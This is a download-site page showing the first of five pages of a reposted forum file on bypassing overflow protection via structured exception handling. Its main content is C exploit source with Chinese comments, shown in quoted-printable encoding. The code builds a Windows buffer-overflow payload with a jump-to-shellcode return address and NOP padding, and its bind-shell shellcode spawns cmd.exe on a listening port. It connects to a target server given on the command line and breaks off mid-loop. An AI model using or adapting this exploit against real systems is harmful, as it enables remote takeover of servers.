⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 [转帖+注释]利用结构异常绕过溢出保护攻击.mht

📁 精华BBS贴子
💻 MHT
📖 第 1 页 / 共 5 页
字号:
🔍
12345 

                        main(int argc, char **argv)<BR>{ =
<BR>&nbsp;&nbsp;char=20
                        *server;<BR>&nbsp;&nbsp;char=20
                        =
*str=3D"\x1f\x90""LoadLibraryA""\x0""CreatePipe""\x0"&nbsp;&nbsp;<BR>&nbs=
p;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;"CreateProcessA""\x0""CloseHandle""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"PeekNamedPipe""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"ReadFile""\x0""WriteFile""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"wsock32.dll""\x0""socket""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"bind""\x0""listen""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"accept""\x0""send""\x0"<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"recv""\x0""ioctlsocket""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;=20
                        &nbsp;"closesocket""\x0"<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;"cmd.exe""\x0""exit\x0d\x0a""\x0"<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp; =
&nbsp;"strend";=20
                        =
//=CA=D7=C1=BD=B8=F6=D7=D6=BD=DA=CE=AA=B0=F3=B6=A8=B6=CB=BF=DA<BR><BR>/*&=
nbsp;&nbsp;shellcode=D3=C3=B5=BD=B5=C4api=C3=FB=B5=C8=D7=D6=B7=FB=B4=AE=20
                        */<BR><BR>&nbsp;&nbsp;char=20
                        =
*fnendstr=3D"\x90\x90\x90\x90\x90\x90\x90\x90\x90";<BR>&nbsp;&nbsp;char&n=
bsp;&nbsp;eipwinnt[]=3D"\x63\x0d\xfa\x7f";<BR><BR>/*&nbsp;=20
                        &nbsp;jmp ebx&nbsp;&nbsp;address */<BR>/*=20
                        =
<BR>win2000=B7=A2=C9=FA=D2=EC=B3=A3=CA=B1ebx=D6=B8=CF=F2=D2=EC=B3=A3=BD=E1=
=B9=B9=A3=AC<BR>winnt=20
                        =
=D3=D0=B5=C4=B0=E6=B1=BE=CA=C7esi,=D3=D0=B5=C4=B0=E6=B1=BE=CA=C7edi<BR>*/=
<BR>&nbsp;&nbsp;char&nbsp;&nbsp;JMPNEXTJMP[]=3D"\x90\x90\x90\x2d";<BR>/* =

                        <BR>0x2d&nbsp;&nbsp;sub eax,num32=20
                        =
<BR>=D3=C3=D3=DA=C6=BD=BA=E2=BA=F3=C3=E6=B5=C44=D7=D6=BD=DA=C8=CE=D2=E2=B4=
=FA=C2=EB=A3=AC=CA=B9=B5=C3=C1=AC=D0=F8=B8=B2=B8=C7=D2=E7=B3=F6=B5=E3=B5=C4=
=D5=E2=B6=CE=B4=FA=C2=EB=D6=B8=C1=EE=B5=C8=D0=A7=D3=DANOP<BR>*/<BR>&nbsp;=
&nbsp;char&nbsp;&nbsp;JMPSHELL[]=3D"\xe9\x40\xf0\xff\xff";&nbsp;&nbsp;//j=
mp=20
                        -0xfc0h<BR>&nbsp;&nbsp;char&nbsp; &nbsp;=20
                        buff[BUFFSIZE];<BR>&nbsp;&nbsp;char&nbsp; &nbsp; =

                        recvbuff[BUFFSIZE];<BR>&nbsp;&nbsp;char&nbsp; =
&nbsp;=20
                        =
shellcodebuff[0x1000];<BR>&nbsp;&nbsp;struct&nbsp;&nbsp;sockaddr_in=20
                        =
s_in2,s_in3;<BR>&nbsp;&nbsp;struct&nbsp;&nbsp;hostent=20
                        *he;<BR>&nbsp;&nbsp;char&nbsp; &nbsp;=20
                        =
*shellcodefnadd,*chkespadd;<BR>&nbsp;&nbsp;unsigned&nbsp;&nbsp;int=20
                        sendpacketlong;<BR>&nbsp;&nbsp;int=20
                        i,j,k;<BR>&nbsp;&nbsp;unsigned&nbsp;&nbsp;char=20
                        temp;<BR>&nbsp;&nbsp;int&nbsp;=20
                        &nbsp;&nbsp;&nbsp;fd;<BR>&nbsp;&nbsp;u_short=20
                        =
port,port1,shellcodeport;<BR>&nbsp;&nbsp;SOCKET&nbsp;&nbsp;d_ip;<BR>&nbsp=
;&nbsp;WSADATA=20
                        wsaData;<BR>&nbsp;&nbsp;int =
offset=3D0;<BR>&nbsp;&nbsp;int=20
                        OVERADD=3DRETEIPADDRESS;<BR>&nbsp;&nbsp;int=20
                        OVERADD2=3D0xfb8;<BR>&nbsp;&nbsp;int result=3D=20
                        WSAStartup(MAKEWORD(1, 1),=20
                        &amp;wsaData);<BR>&nbsp;&nbsp;if (result !=3D=20
                        0)<BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp; =
fprintf(stderr,=20
                        "Your computer was not connected "<BR>&nbsp; =
&nbsp; "to=20
                        the Internet at the time that "<BR>&nbsp; &nbsp; =
"this=20
                        program was launched, or you "<BR>&nbsp; &nbsp; =
"do not=20
                        have a 32-bit "<BR>&nbsp; &nbsp; "connection to =
the=20
                        Internet."<IMG=20
                        =
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
                        align=3DabsMiddle border=3D0>;<BR>&nbsp; &nbsp;=20
                        =
exit(1);<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;if(argc&gt;3)<BR>&nbsp;=20
                        &nbsp; =
port=3Datoi(argv[3]);<BR>&nbsp;&nbsp;else<BR>&nbsp;=20
                        &nbsp; port=3DWEBPORT;<BR>&nbsp;&nbsp;if(argc=20
                        &lt;2)<BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp; =
WSACleanup(=20
                        );<BR>&nbsp; &nbsp; fprintf(stderr, "\n except =
over=20
                        1.0."<IMG=20
                        =
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
                        align=3DabsMiddle border=3D0>;<BR>&nbsp; &nbsp;=20
                        fprintf(stderr, "\n copy by yuange =
2000.06.20."<IMG=20
                        =
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
                        align=3DabsMiddle border=3D0>;<BR>&nbsp; &nbsp;=20
                        fprintf(stderr, "\n welcome to my homepage <A=20
                        href=3D"http://yuange.yeah.net./"=20
                        =
target=3D_blank>http://yuange.yeah.net./</A>"<IMG=20
                        =
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
                        align=3DabsMiddle border=3D0>;<BR>&nbsp; &nbsp;=20
                        fprintf(stderr, "\n usage: %s &lt;server&gt; =
[shellport]=20
                        [webport] \n", argv[0]);<BR>&nbsp; &nbsp;=20
                        =
exit(1);<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;else<BR>&nbsp;=20
                        &nbsp; server =3D argv[1];<BR>&nbsp;&nbsp;d_ip =
=3D=20
                        =
inet_addr(server);<BR>&nbsp;&nbsp;if(d_ip=3D=3D-1)<BR>&nbsp;&nbsp;{<BR>&n=
bsp;=20
                        &nbsp; he =3D gethostbyname(server);<BR>&nbsp; =
&nbsp;=20
                        if(!he)<BR>&nbsp; &nbsp;&nbsp;&nbsp;{<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp; WSACleanup( );<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp; printf("\n Can't get the ip =
of %s=20
                        !\n",server);<BR>&nbsp; &nbsp;&nbsp; &nbsp;=20
                        exit(1);<BR>&nbsp; &nbsp;&nbsp;&nbsp;} =
<BR>&nbsp; &nbsp;=20
                        else<BR>&nbsp; &nbsp;&nbsp; =
&nbsp;memcpy(&amp;d_ip,=20
                        he-&gt;h_addr,=20
                        4);<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;fd =3D=20
                        socket(AF_INET,=20
                        =
SOCK_STREAM,0);<BR>&nbsp;&nbsp;i=3D8000;<BR>&nbsp;&nbsp;setsockopt(fd,SOL=
_SOCKET,SO_RCVTIMEO,(const=20
                        char *)=20
                        =
&amp;i,sizeof(i));<BR>&nbsp;&nbsp;s_in3.sin_family =3D=20
                        AF_INET;<BR>&nbsp;&nbsp;s_in3.sin_port =3D=20
                        =
htons(port);<BR>&nbsp;&nbsp;s_in3.sin_addr.s_addr =3D=20
                        d_ip;<BR>&nbsp;&nbsp;printf("\n nuke ip: %s port =

                        =
%d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));<BR>&nbsp;&nbsp;if(c=
onnect(fd,=20
                        (struct sockaddr *)&amp;s_in3, sizeof(struct=20
                        sockaddr_in))!=3D0)<BR>&nbsp;&nbsp;{<BR>&nbsp;=20
                        &nbsp;closesocket(fd);<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;WSACleanup( );<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;fprintf(stderr,"\n&nbsp;&nbsp;connect =
err."<IMG=20
                        =
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
                        align=3DabsMiddle border=3D0>;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        =
&nbsp;exit(1);<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;_asm<BR>&nbsp;&nbsp;{<BR>&=
nbsp;=20
                        &nbsp; mov ESI,ESP<BR>&nbsp; &nbsp; cmp=20
                        =
ESI,ESP<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;_chkesp();<BR>&nbsp;&nbsp;chkespa=
dd=3D_chkesp;&nbsp;=20
                        =
&nbsp;//=C8=E7=B9=FB=B2=BB=CA=C7=D3=C3=CC=F8=D7=AA=B5=F7=D3=C3=A3=AC=D4=F2=
=D6=B1=BD=D3=BB=F1=B5=C3=B5=D8=D6=B7<BR>&nbsp;&nbsp;temp=3D*chkespadd;<BR=
>&nbsp;&nbsp;if(temp=3D=3D0xe9)<BR>&nbsp;&nbsp;{&nbsp;=20
                        &nbsp; =
//=C8=E7=B9=FB=CA=B9=D3=C3=CC=F8=D7=AA=B5=F7=D3=C3=A3=AC=BD=ABjmp=20
                        =
xxxx=D6=D0=B5=C4=B5=D8=D6=B7=CC=E1=C8=A1=B3=F6=C0=B4=A3=AC=BE=F8=B6=D4=B5=
=D8=D6=B7=CE=AAchkespadd+xxxx+4<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;++chkespadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp; i=3D*(int*)chkespadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;chkespadd+=3Di;<BR>&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;chkespadd+=3D4;<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;shellcodefnadd=3Dsh=
ellcodefnlock;&nbsp;=20
                        &nbsp;=20
                        =
//=CD=AC=C9=CF,=C1=BD=D6=D6=CC=D6=C2=DB=BB=F1=B5=C3shellcodefnlock=B5=D8=D6=
=B7=A3=AC=B4=CB=BA=AF=CA=FD=CE=AA=BD=E2=B1=E0=C2=EB<BR>&nbsp;&nbsp;temp=3D=
*shellcodefnadd;<BR>&nbsp;&nbsp;if(temp=3D=3D0xe9)=20
                        <BR>&nbsp;&nbsp;{<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;++shellcodefnadd;<BR>&nbsp; &nbsp;&nbsp;=20
                        &nbsp;k=3D*(int *)shellcodefnadd;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        &nbsp;shellcodefnadd+=3Dk;<BR>&nbsp; =
&nbsp;&nbsp;=20
                        =
&nbsp;shellcodefnadd+=3D4;<BR>&nbsp;&nbsp;}<BR><BR>&nbsp;&nbsp;for(k=3D0;=
k&lt;=3D0x500;++k)<BR>&nbsp;&nbsp;{<BR>&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)=3D=3D0)=20
                        break;&nbsp;=20
                        =
&nbsp;//=B6=A8=CE=BB=CE=D2=C3=C7=B6=A8=D2=E5=B5=C4=B1=EA=D6=BE=A3=AC=BE=CD=
=CA=C7=C4=C7=B8=F6=BF=AA=CD=B7=B5=C49=B8=F6nop<BR>&nbsp;&nbsp;}<BR><BR>&n=
bsp;&nbsp;memset(buff,NOPCODE,BUFFSIZE);=20
                        =
//buf=C7=E5=BF=D5<BR>&nbsp;&nbsp;memcpy(buff+OVERADD+NOPLONG,shellcodefna=
dd+k+4,0x80);//&nbsp;&nbsp;=D4=DA=BD=ABshellcodefnlock=BA=AF=CA=FD=B8=B4=D6=
=C6=B5=BDbuf+32=BF=AA=CA=BC=B4=A6<BR><BR><BR>&nbsp;&nbsp;/*&nbsp;=20
                        &nbsp;&nbsp;&nbsp;buff=BD=E1=B9=B9<BR>&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;[NNNNNNNN][NNNN][shellcodefnlock=20
                        =
NNNNNNN&nbsp;&nbsp;]<BR>&nbsp;&nbsp;32=B8=F6&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;4=B8=F6<BR>&nbsp;&nbsp;*/<BR>&nbsp;&nbsp;shellcodefnadd=
=3Dshellcodefn;&nbsp;=20
                        =
&nbsp;//=B6=A8=CE=BBshellcodefn=BA=AF=CA=FD=B5=D8=D6=B7=A3=AC=D2=B2=B7=D6=
=CE=AA=C1=BD=D6=D6=C7=E9=BF=F6=B7=D6=CE=F6<BR>&nbsp;&nbsp;temp=3D*shellco=
defnadd;<BR>&nbsp;&nbsp;if(temp=3D=3D0xe9)=20
                        <BR>&nbsp;&nbsp;{<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;++shellcodefnadd;<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;k=3D*(int =
*)shellcodefnadd;<BR>&nbsp;=20
                        &nbsp;&nbsp;&nbsp;shellcodefnadd+=3Dk;<BR>&nbsp; =

                        =
&nbsp;&nbsp;&nbsp;shellcodefnadd+=3D4;<BR>&nbsp;&nbsp;}<BR>&nbsp;&nbsp;fo=
r(k=3D0;k&lt;=3D0x1000;++k)<BR>&nbsp;&nbsp;{<BR>&nbsp;=20
                        &nbsp;=20
                        =
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)=3D=3D0)=20
                        =
break;//k=CE=AAshellcodefn=BA=AF=CA=FD=B5=C4=B4=F3=D0=A1<BR>&nbsp;&nbsp;}=
<BR><BR>memcpy(shellcodebuff,shellcodefnadd,k);<BR>&nbsp;&nbsp;cleanchkes=
p(shellcodefnadd,shellcodebuff,chkespadd,k);//=C7=E5=B3=FDshellcodefn=BA=AF=
=CA=FD=D6=D0=B5=C4chkesp()=B5=F7=D3=C3<BR><BR><BR>//=BD=AB=D0=E8=D2=AA=B5=
=F7=D3=C3=B5=C4=BA=AF=CA=FD=D7=D6=B7=FB=B4=AB=BF=BD=B1=B4=B5=BDshellcodeb=
uff=D6=D0<BR><BR>for(i=3D0;i&lt;0x400;++i){=20
                        <BR>if(memcmp(str+i,"strend",6)=3D=3D0)=20
                        =
break;<BR>&nbsp;&nbsp;}&nbsp;&nbsp;<BR>&nbsp;&nbsp;memcpy(shellcodebuff+k=
,str,i);<BR><BR>&nbsp;&nbsp;if(argc&gt;2)&nbsp;&nbsp;shellcodeport=3Datoi=
(argv[2]);<BR>&nbsp;&nbsp;else&nbsp;=20
                        &nbsp;&nbsp;=20
                        =
&nbsp;&nbsp;&nbsp;shellcodeport=3DSHELLPORT;<BR><BR>&nbsp;&nbsp;if(shellc=
odeport=3D=3D0)=20
                        =
shellcodeport=3DSHELLPORT;<BR>&nbsp;&nbsp;shellcodeport=3Dhtons(shellcode=
port);<BR>&nbsp;&nbsp;*(u_short=20
                        =
*)(shellcodebuff+k)=3Dshellcodeport;<BR>&nbsp;&nbsp;fprintf(stderr,"\n=20
                        shellport=20
                        =
%d",htons(shellcodeport));<BR><BR><BR>&nbsp;&nbsp;sendpacketlong=3Dk+i;<B=
R>&nbsp;&nbsp;for(k=3D0;k&lt;=3D0x200;++k){<BR>&nbsp;=20
                        &nbsp;&nbsp; &nbsp;&nbsp;=20
                        =
&nbsp;if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)=3D=3D0)=20
                        break;<BR>&nbsp;&nbsp;}&nbsp;=20
                        =
&nbsp;//=B6=A8=CE=BB=C1=ED=CD=E2=B5=C4=C4=C7=B8=F6shellcodefnlock=BA=AF=CA=
=FD=BD=E1=CE=B2=B4=A6=B5=C49=B8=F6nop<BR><BR>&nbsp;&nbsp;for(i=3D0;i&lt;s=
endpacketlong;++i){<BR>&nbsp;=20
12345

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -